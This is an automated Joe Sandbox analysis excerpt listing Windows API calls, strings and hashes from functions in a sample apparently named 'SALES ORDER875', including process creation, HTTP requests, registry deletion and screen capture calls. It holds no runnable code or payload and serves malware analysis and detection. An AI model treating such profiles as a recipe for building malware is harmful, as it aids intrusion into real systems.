                                                                                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                    • API String ID: 66158676-1714406822
                                                                                                                                                                                    • Opcode ID: 6cedcaf27c9a6f76af2ed1eb447db8e9bda137e3230d4e968bfc128032236eb3
                                                                                                                                                                                    • Instruction ID: 28bb839ae4531397eac71692dd865c4e8ca01c16f8a41411b6387f1f5bab7581
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cedcaf27c9a6f76af2ed1eb447db8e9bda137e3230d4e968bfc128032236eb3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61210B36A847116FD7166BA4AC46FEE73A4DB06B51F11423AFC06E6291DF749C008A9C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,0041CC08), ref: 003F4527
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F453B
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F4599
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F45F4
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F463F
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F46A7
                                                                                                                                                                                      • Part of subcall function 0039F9F2: _wcslen.LIBCMT ref: 0039F9FD
                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00446BF0,00000061), ref: 003F4743
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                                                                    • Opcode ID: de819e6624648b2879ad34d8a66c413f4133f3a44413d79dfb868b3ab551a0da
                                                                                                                                                                                    • Instruction ID: 4576a2cd6b82b62b14729a7c5cf59a850e148246f4d4dd37c7083f5203fc3bac
                                                                                                                                                                                    • Opcode Fuzzy Hash: de819e6624648b2879ad34d8a66c413f4133f3a44413d79dfb868b3ab551a0da
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBB123316083069FC712EF28C890A7BB7E5EFA6720F51491DF6A6CB291D734D944CB52
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00399BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00399BB2
                                                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00419147
                                                                                                                                                                                      • Part of subcall function 00417674: ClientToScreen.USER32(?,?), ref: 0041769A
                                                                                                                                                                                      • Part of subcall function 00417674: GetWindowRect.USER32(?,?), ref: 00417710
                                                                                                                                                                                      • Part of subcall function 00417674: PtInRect.USER32(?,?,00418B89), ref: 00417720
                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004191B0
                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004191BB
                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004191DE
                                                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00419225
                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0041923E
                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00419255
                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00419277
                                                                                                                                                                                    • DragFinish.SHELL32(?), ref: 0041927E
                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00419371
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#E
                                                                                                                                                                                    • API String ID: 221274066-1996462402
                                                                                                                                                                                    • Opcode ID: d939b0e707c7b0e79eba981b9b217e0df799f9a360e99e53067a2b9018386ade
                                                                                                                                                                                    • Instruction ID: 6d2dbc34e2b35d7e6ec7edfcd120d2236bd908b429ffc8c3c5d4499af6002b13
                                                                                                                                                                                    • Opcode Fuzzy Hash: d939b0e707c7b0e79eba981b9b217e0df799f9a360e99e53067a2b9018386ade
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD618A71108301AFD701EF60DC85EAFBBF8EF88750F04496EF596961A1DB309A49CB66
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040B198
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040B1B0
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040B1D4
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040B200
                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040B214
                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040B236
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040B332
                                                                                                                                                                                      • Part of subcall function 003F05A7: GetStdHandle.KERNEL32(000000F6), ref: 003F05C6
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040B34B
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040B366
                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0040B3B6
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0040B407
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040B439
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B44A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B45C
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B46E
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040B4E3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2178637699-0
                                                                                                                                                                                    • Opcode ID: 6f55a750ac089020fcb6aa238974ce96ba4eba2959fafc874e9a7f0e7b9959c9
                                                                                                                                                                                    • Instruction ID: 73ef67725854791404024b8ed7fd8cfb5c6931641067e779b9e14619bfb7d10b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f55a750ac089020fcb6aa238974ce96ba4eba2959fafc874e9a7f0e7b9959c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7F178316043409FC715EF24C881A6BBBE5EF85714F14856EF895AF2A2DB35EC40CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetMenuItemCount.USER32(00451990), ref: 003C2F8D
                                                                                                                                                                                    • GetMenuItemCount.USER32(00451990), ref: 003C303D
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 003C3081
                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 003C308A
                                                                                                                                                                                    • TrackPopupMenuEx.USER32(00451990,00000000,?,00000000,00000000,00000000), ref: 003C309D
                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C30A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                                                                                    • Opcode ID: ddc74c7f64238cd7e5f3b94e687b0100bf828ae91952c6751ef1d035b7f87102
                                                                                                                                                                                    • Instruction ID: ce22caf9908c6a89bac44ade353d2b8501045b77b664a696749db4734806801e
                                                                                                                                                                                    • Opcode Fuzzy Hash: ddc74c7f64238cd7e5f3b94e687b0100bf828ae91952c6751ef1d035b7f87102
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42711B71644215BEEB239F28CC89F9BBF69FF05724F20421AF515AA1E0C7B1AD10C750
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00416DEB
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00416E5F
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00416E81
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00416E94
                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00416EB5
                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00380000,00000000), ref: 00416EE4
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00416EFD
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00416F16
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00416F1D
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00416F35
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00416F4D
                                                                                                                                                                                      • Part of subcall function 00399944: GetWindowLongW.USER32(?,000000EB), ref: 00399952
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                                                                                    • Opcode ID: 80b550957edbed3805ac392c509c24841bef8d89b4befcb83796da0c61639fce
                                                                                                                                                                                    • Instruction ID: 0e5edec8e439befb373b0da4fed41132ae9d502b05c9f3d1ada52a74fa0a5036
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80b550957edbed3805ac392c509c24841bef8d89b4befcb83796da0c61639fce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F7168B4244340AFDB21CF18DC84BABBBE9FB88304F04452EF99987261C774E946CB19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003FC4B0
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003FC4C3
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003FC4D7
                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003FC4F0
                                                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003FC533
                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003FC549
                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003FC554
                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003FC584
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003FC5DC
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003FC5F0
                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 003FC5FB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                                                                    • Opcode ID: 337e55cade3208996aec4c2b2555eb700ca1b4ec061212dbf3713562a00dcc42
                                                                                                                                                                                    • Instruction ID: aaf3fcd36ca58ec2ef3337fa68a67e29ca9072f91dc61b7861d75d913420cbb6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 337e55cade3208996aec4c2b2555eb700ca1b4ec061212dbf3713562a00dcc42
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22516EB059020DBFDB228F61CE88ABB7BBCFF05354F009429FA4996650DB70E904DB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00418592
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004185A2
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004185AD
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004185BA
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004185C8
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004185D7
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004185E0
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004185E7
                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 004185F8
                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041FC38,?), ref: 00418611
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00418621
                                                                                                                                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00418641
                                                                                                                                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00418671
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00418699
                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004186AF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                                                    • Opcode ID: 36d09509716de003b086ee997a07ca122faa676bca34165ef8df2f31a6fd2f35
                                                                                                                                                                                    • Instruction ID: b952cd6c6d71f457908caac438e23d90bdac5f5407ef7f3f50b22b6c0192e8e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36d09509716de003b086ee997a07ca122faa676bca34165ef8df2f31a6fd2f35
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC410975640208BFDB119FA5DC88EEB7BB9EF89711F108069F905E7260DB349941CB68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 003F1502
                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 003F150B
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003F1517
                                                                                                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003F15FB
                                                                                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 003F1657
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003F1708
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 003F178C
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003F17D8
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003F17E7
                                                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 003F1823
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                                                                                                    • Opcode ID: caa90aa3c1f2b19361e6dc177a72b03d827594bf910d94cdb3943f9ba95e3b6b
                                                                                                                                                                                    • Instruction ID: 008f264851a307c80314643e5fd108f130c98b8a1c8c5a39bf095d3ce34ca694
                                                                                                                                                                                    • Opcode Fuzzy Hash: caa90aa3c1f2b19361e6dc177a72b03d827594bf910d94cdb3943f9ba95e3b6b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 68D11532A00619DBDF16AF65E885B7DB7B9BF46700F148066F60AAF580DB30DC44DBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                      • Part of subcall function 0040C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040B6AE,?,?), ref: 0040C9B5
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040C9F1
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040CA68
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040CA9E
                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040B6F4
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040B772
                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 0040B80A
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040B87E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040B89C
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040B8F2
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0040B904
                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0040B922
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040B983
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040B994
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                                                                                    • Opcode ID: e493b0c0efdf621a75920064fe47472dbfced549798ec4c1f7b7a25276dc9100
                                                                                                                                                                                    • Instruction ID: 008a9bc0e3cd2a77f1d1538a7a3f1c831148fa343b20225ced38029f8559ba7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e493b0c0efdf621a75920064fe47472dbfced549798ec4c1f7b7a25276dc9100
                                                                                                                                                                                    • Instruction Fuzzy Hash: A9C18C31208201AFD711EF14C495F2ABBE5FF84308F1485ADE59A5B3A2CB75EC45CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004025D8
                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004025E8
                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 004025F4
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00402601
                                                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0040266D
                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004026AC
                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004026D0
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 004026D8
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004026E1
                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 004026E8
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 004026F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                                                                    • Opcode ID: 2330328a999a4dc06bbeb25e7fec671b73e60718a88b72657a41b0e541fa07af
                                                                                                                                                                                    • Instruction ID: ab70d3ca08b36fab126a09f0853f61ed370cbd77b919b3b631a247427da44e39
